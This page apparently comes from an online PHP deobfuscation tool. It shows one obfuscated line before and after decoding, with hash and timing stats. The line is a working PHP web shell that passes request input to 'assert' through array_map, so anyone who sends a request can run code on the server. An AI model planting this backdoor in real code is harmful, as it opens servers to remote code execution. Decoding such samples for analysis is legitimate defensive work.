Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php $new_array = array_map("ass\x65rt", (array)$_REQUEST['op']); ?>..
Decoded Output download
<?php
$new_array = array_map("assert", (array)$_REQUEST['op']);
?>
Did this file decode correctly?
Original Code
<?php
$new_array = array_map("ass\x65rt", (array)$_REQUEST['op']);
?>
Function Calls
None |
Stats
MD5 | b9b3bdce44cb9b13c853fd9bdaedfa88 |
Eval Count | 0 |
Decode Time | 78 ms |